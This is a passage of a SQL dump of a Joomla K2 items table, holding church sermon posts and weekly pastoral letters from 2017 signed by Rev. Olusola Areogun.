'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(26, 'From our Father\'s Heart (19/02/2017)', 'from-our-father-s-heart-19-02-2017', 5, 1, '<p><em><strong>Dearly Beloved,</strong></em></p>\r\n<p>John 10: 4-5 says “ And when he putteth forth his own sheep, he goeth before them, and the sheep follow him: for they know his voice. And  a stranger will they not follow, but will flee from him: for they know not the voice of strangers.</p>\r\n<p>Your security and safety in 2017 will be dependent on how much of God’s voice you can recognize and obey.</p>\r\n', '\r\n<p>The voice of God comes to a man with power. It is God’s voice that comes to us and opens new possibilities of life to us. The safety of every sheep is in the ability of that sheep to recognize the shepherd’s voice. The proof of your son-ship is in your ability to hear God’s voice. There are many voices in the world, but it is only one voice that God wants you to master and respond to always, and that is the voice of the Lord.</p>\r\n<p> Whenever the voice of the Lord comes to a man, his life picks up. I Sam 3:4 says “the Lord called Samuel: and he answered, Here am I”. From that point on, the journey of Samuel only went upward and forward. Isaiah heard the voice of the Lord in Isaiah 6:8 saying “Also I heard the voice of the Lord, saying, whom shall I send, and who will go for us? Then said I, Here am I; send me”. The voice of the Lord is what makes all the difference.</p>\r\n<p>I want you in 2017 to develop more than never before your ability to hear the voice of the Lord. When you see people struggle in life, it is because they are not hearing correctly or they are hearing wrong voice. Isaiah 30:21 says “ And thine ears shall hear a word behind thee, saying, This is the way, walk ye in it, when ye turn to the right hand, and when ye turn to the left.” God is always in the habit of speaking to His children, but men are also always in the habit of not listening to His voice.</p>\r\n<p>When a man masters hearing the voice of the Lord, he will be at an advantage in life. God told me when I started ministry, two subjects that I must master so well: HOW TO BE LED BY THE HOLY SPIRIT and HOW TO LIVE BY FAITH. This is my 34th year of obeying God’s call, every time I see men struggle in life and get stranded, they missed the voice of God somewhere. That has never failed before.</p>\r\n<p>Your next level is directly linked to your ability to hear the voice of the Lord. Any time we lose the voice of God, we lose direction and participation of the Lord. It is the voice of the Lord that brings new mercies into our lives. It is the voice of the Lord that gives us our daily allocations. It is the voice of the Lord that takes us to new heights and new realms in God.</p>\r\n<p>It is the voice of the Lord that guarantees our safety, security, progress and success in life. Let your desire and outcry be in 2017 to learn more to listen to the voice of the Lord, and that will guaranty your perpetual victory as you go in the days ahead. </p>\r\n<p>Till next week, go and win with Jesus.</p>\r\n<p>God’s Servant</p>\r\n<p>Rev. Olusola Areogun.</p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-02-19 19:09:27', 196, '', 0, '0000-00-00 00:00:00', '2017-02-26 17:49:25', 196, '2017-02-19 19:09:27', '0000-00-00 00:00:00', 0, 1, 8, 1, 0, '', '', '', '', 2281, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(27, 'From our Father\'s Heart (26/02/2017)', 'from-our-father-s-heart-26-02-2017', 5, 1, '<p>Dearly beloved of God, </p>\r\n<p>Let your training in the Dream Centre become your habits. What habits are you cultivating in your life? The habits you allow to grow and fester in your life will determine where you arrive in your destiny journey. Your habits are vehicles that determine where you eventually end up in life and destiny. Let your training in the Dream Centre become your habit.</p>\r\n', '\r\n<p>The Lord has told us that the Dream Centre is not just a church, the Dream Centre is training. Therefore you must become a conscious learner and take training serious. </p>\r\n<p>The best way to get the most of your training in the house is to translate your training to your habits. The all-night trainings, the prayer programs and schedule, the ability to sit down and listen actively and intently to sound teaching is aimed at building increased capacity in your life and is supposed to become a part of your daily life style. The reason for your seemly tough training is because of the destiny and assignment of God hanging on your life and you cannot afford to be careless with your training. You must translate training into habit. Anything you do consistently for twenty one days becomes your habit. Adopt the positive habits and let it be part of your life. In so doing you would be securing the great future that God has preserved for you in destiny. </p>\r\n<p>Break bad and negative habits and let the Holy Spirit help you because the bad and negative habits you do not check and break now will grow out of hand into strange sins, that will limit how effective and relevant you will be in the terrain of your destiny. I have always told you that the devil is a smart fighter and is looking for how to make you unfit and powerless when you confront him in the place of your purpose in God. Do not fall for the demonic lie of the devil that makes you feels that the demands of training are too much for you, don’t peak too soon. Avoid people who make you feel that the demands are too much. </p>\r\n<p>Remember that training might not be sweet when you are going through, however the strength, character and value it adds to your life is beautiful to behold when you start to function in your destiny. There are people who try to escape from training and complain in the place of training, only to regret later when the substance that is supplied in the place of training is being demanded of them and they find it difficult to produce.  Translate your training into habits, break bad and negative habits because demonic fronts actually advance through unbroken negative habits hence, robbing you of your future in God.</p>\r\n<p> May you not waste divine training and preparation. </p>\r\n<p>Till next week go and win with Jesus.</p>\r\n<p>God’s servant,</p>\r\n<p>Rev Olusola Areogun</p>', NULL, NULL, '[]', '', '2017-02-26 17:49:27', 196, '', 0, '0000-00-00 00:00:00', '2017-03-05 08:38:11', 196, '2017-02-26 17:49:27', '0000-00-00 00:00:00', 0, 1, 9, 0, 0, '', '', '', '', 1810, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(28, 'Critical Points in the Gospel of Salvation', 'salvation', 2, 1, '<p>Text: Acts 3:17 – end.</p>\r\n<p> And now, brethren, I wot that through ignorance ye did it, as did also your rulers.</p>\r\n<p> 18  But those things, which God before had shewed by the mouth of all his prophets, that Christ should suffer, he hath so fulfilled.</p>\r\n<p>19  Repent ye therefore, and be converted, that your sins may be blotted out, when the times of refreshing shall come from the presence of the Lord;</p>\r\n', '\r\n<p>20  And he shall send Jesus Christ, which before was preached unto you:</p>\r\n<p>21  Whom the heaven must receive until the times of restitution of all things, which God hath spoken by the mouth of all his holy prophets since the world began.</p>\r\n<p>22  For Moses truly said unto the fathers, A prophet shall the Lord your God raise up unto you of your brethren, like unto me; him shall ye hear in all things whatsoever he shall say unto you.</p>\r\n<p>23  And it shall come to pass, that every soul, which will not hear that prophet, shall be destroyed from among the people.</p>\r\n<p>24  Yea, and all the prophets from Samuel and those that follow after, as many as have spoken, have likewise foretold of these days.</p>\r\n<p>25  Ye are the children of the prophets, and of the covenant which God made with our fathers, saying unto Abraham, And in thy seed shall all the kindreds of the earth be blessed.</p>\r\n<p>26  Unto you first God, having raised up his Son Jesus, sent him to bless you, in turning away every one of you from his iniquities.</p>\r\n<p> </p>\r\n<p><strong>Introduction:</strong> Today we will move on to see the critical points in the gospel of salvation.</p>\r\n<p>In attempting to lead souls to Christ, you must know what to tell the sinner, the truths to share that will touch their hearts for Jesus.</p>\r\n<p>The Following Points Are Good But Will Not Save The Sinner:</p>\r\n<ol>\r\n<li>Stop smoking cigarettes or womanizing or cheating.</li>\r\n<li>Come to our church next week Sunday.</li>\r\n<li>My pastor can pray for you and your problem will go etc.</li>\r\n</ol>\r\n<p>When you have the privilege of ministering to sinner, what must he be told amongst other things?</p>\r\n<p>:: Verse 17 – Don’t condemn him; he is sinning in ignorance. He is in darkness. You are his help into the light. Don’t judge him … help him.</p>\r\n<p>:: Verse 18 – Let him know that Christ is God’s plan for his salvation. If he was the only sinner, Jesus would still have come to die to save him … God loves him that much! Show him God’s love not his shortcomings.</p>\r\n<p>:: Verse 19 – Demand for repentance; change of heart, change of Lordship, change of ways etc. He must switch from following self to following God. Tell him about the forgiveness that God only gives. 1 John 1:8 – 10.</p>\r\n<p>:: Verse 20 – 26: Help him to trace his roots back to God – whoever he may be – Muslim, Celestial, C &amp; S, Occultist… help him to know how he is God’s creature and God has gone to the extent of Jesus’ death on the cross and the resurrection to bring him back to God.</p>\r\n<p>May God help you as you lead men to Christ in Jesus name.</p>', NULL, NULL, '[]', '', '2017-03-04 22:36:16', 196, '', 0, '0000-00-00 00:00:00', '2017-03-12 16:54:56', 196, '2017-03-04 22:36:16', '0000-00-00 00:00:00', 0, 1, 14, 0, 0, '', '', '', '', 3139, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(29, 'From our Father\'s Heart (05/03/2017)', 'from-our-father-s-heart-05-03-2017', 5, 1, '<p>Dearly beloved of God, </p>\r\n<p>Let your training in the Dream Centre become your habits. What habits are you cultivating in your life? The habits you allow to grow and fester in your life will determine where you arrive in your destiny journey. Your habits are vehicles that determine where you eventually end up in life and destiny. Let your training in the Dream Centre become your habit. The Lord has told us that the Dream Centre is not just a church, the Dream Centre is training.</p>\r\n', '\r\n<p>Therefore you must become a conscious learner and take training serious. </p>\r\n<p>The best way to get the most of your training in the house is to translate your training to your habits. The all-night trainings, the prayer programs and schedule, the ability to sit down and listen actively and intently to sound teaching is aimed at building increased capacity in your life and is supposed to become a part of your daily life style. The reason for your seemly tough training is because of the destiny and assignment of God hanging on your life and you cannot afford to be careless with your training. You must translate training into habit. Anything you do consistently for twenty one days becomes your habit. Adopt the positive habits and let it be part of your life. In so doing you would be securing the great future that God has preserved for you in destiny. </p>\r\n<p>Break bad and negative habits and let the Holy Spirit help you because the bad and negative habits you do not check and break now will grow out of hand into strange sins, that will limit how effective and relevant you will be in the terrain of your destiny. I have always told you that the devil is a smart fighter and is looking for how to make you unfit and powerless when you confront him in the place of your purpose in God. Do not fall for the demonic lie of the devil that makes you feels that the demands of training are too much for you, don’t peak too soon. Avoid people who make you feel that the demands are too much. </p>\r\n<p>Remember that training might not be sweet when you are going through, however the strength, character and value it adds to your life is beautiful to behold when you start to function in your destiny. There are people who try to escape from training and complain in the place of training, only to regret later when the substance that is supplied in the place of training is being demanded of them and they find it difficult to produce.  Translate your training into habits, break bad and negative habits because demonic fronts actually advance through unbroken negative habits hence, robbing you of your future in God.</p>\r\n<p> May you not waste divine training and preparation. </p>\r\n<p>Till next week go and win with Jesus.</p>\r\n<p>God’s servant,</p>\r\n<p>Rev Olusola Areogun</p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-03-05 08:38:12', 196, '', 0, '0000-00-00 00:00:00', '2017-03-20 17:54:07', 196, '2017-03-05 08:38:12', '0000-00-00 00:00:00', 0, 1, 10, 0, 0, '', '', '', '', 2014, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(30, 'From our Father\'s Heart (12/03/2017)', 'from-our-father-s-heart-12-03-2017', 5, 1, '<p>Dearly Beloved,</p>\r\n<p>I want to share with you today on some critical truths about assignment. God does not look at how successful men are in business in rating how successful they are, rather he looks at how responsible they are in handling assignments. Assignment is different from ministry, and you must never confuse the two. A man can have a ministry but without assignment, such men don’t last and eventually God will withdraw the ministry.</p>\r\n', '\r\n<p>You must take assignment in Zion serious. Assignment is what develops your potential. In life, nobody promotes a student that is not taking assignments serious. Why should you promote a steward who is not taking assignments serious? That will be enthronement of mediocrity.</p>\r\n<p>There are two kinds of battles in life; I FIGHT BATTLES and WE FIGHT BATTLES. What you do with the assignment you are given in the kingdom is what prepares you for the I FIGHT BATTLES of your life. I want you to take your assignment serious, not for the sake of ministry but because of your personal battles. </p>\r\n<p>There are some of you women that your deliveries will be manifestations of victory. You should not stop praying while you are pregnant.</p>\r\n<p>What you do with your assignment will either create or destroy your future. When God wants to promote a man, He gives him assignment. Faithfulness with assignment is what determines if he is ready for promotion or not. You are not ready for posting until you have passed serious assignments. It doesn’t matter the title you carry, it is assignment that sustains you not title. If your assignment is to clean the church, do it well; it is doing something to your spirit. What is the assignment you are given in Zion? You must apply diligence and seriousness to it. </p>\r\n<p>Go and ask Samson when he decided to be careless with assignment. Delilah showed up and damaged his destiny seriously. Joseph took assignment serious, and that was his safety. David had been taking assignment serious before Goliath’s battle showed up. Goliath’s battle is a promotion battle. He didn’t fail because he was serious with assignment. When your promotion battle shows up, in what state will it meet you? God doesn’t give hand-outs, He gives assignments. God doesn’t give titles, He gives assignment. When God wants to change your level, He gives you assignments.</p>\r\n<p>In Dream Centre, how do you know you are doing fine? Check the assignment you are being given. The pointer to know you are doing well spiritually is assignment. If assignment is being withdrawn from you, it shows you are not doing too well. Assignment is what determines your future. It shows you your future in God. If you fail in assignment, your ministry will be withdrawn. Stop looking for relevance in the kingdom. Take your assignment serious. Assignment is what gets you ready for ministry. Assignment is what prepares us till when God comes for us. </p>\r\n<p>I am saying this because God told me to tell you to take your assignment serious. Something is to be added to your spirit as you give yourself to your assignment. Don\'t just be here for show but for real. Give your best to assignment, and it will make all the difference in your journey as a believer.</p>\r\n<p>Till next week, go and win with Jesus.</p>\r\n<p>God’s Servant</p>\r\n<p>Rev. Olusola Areogun.</p>\r\n<p> </p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-03-12 16:51:41', 196, '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, '2017-03-12 16:51:41', '0000-00-00 00:00:00', 0, 1, 11, 0, 0, '', '', '', '', 2300, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*');
INSERT INTO `y57u5_k2_items` (`id`, `title`, `alias`, `catid`, `published`, `introtext`, `fulltext`, `video`, `gallery`, `extra_fields`, `extra_fields_search`, `created`, `created_by`, `created_by_alias`, `checked_out`, `checked_out_time`, `modified`, `modified_by`, `publish_up`, `publish_down`, `trash`, `access`, `ordering`, `featured`, `featured_ordering`, `image_caption`, `image_credits`, `video_caption`, `video_credits`, `hits`, `params`, `metadesc`, `metadata`, `metakey`, `plugins`, `language`) VALUES
